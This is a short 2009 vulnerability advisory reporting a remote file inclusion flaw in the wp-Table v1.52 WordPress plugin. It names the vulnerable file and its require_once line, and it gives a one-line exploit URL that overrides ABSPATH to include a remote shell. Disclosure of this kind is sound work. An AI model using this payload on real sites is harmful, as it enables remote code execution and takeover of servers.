wordpress plugins wp-Table v1.52 Remote File Inclusion Vulnerability

2009-07-30T00:00:00
ID SECURITYVULNS:DOC:22240
Type securityvulns
Reporter Securityvulns
Modified 2009-07-30T00:00:00

Description

===========================================================================================

[o] wordpress plugins wp-Table v1.52 Remote File Inclusion Vulnerability

   Software     :  wp-Table v1.52
   Vendor       :  http://wordpress.org/
   Download     :

http://wordpress.org/extend/plugins/wp-table/wp-table.zip Author : Cru3l.b0y Home : WwW.DeltaHacking.Net Description : This plugin is a simple table manager for wordpress. ===========================================================================================

[o] Vulnerable file

     js/wptable-tinymce.php

            require_once(ABSPATH.'/wp-admin/admin.php');

[o] Exploit

        http://localhost/[path]/js/wptable-tinymce.php?ABSPATH=shell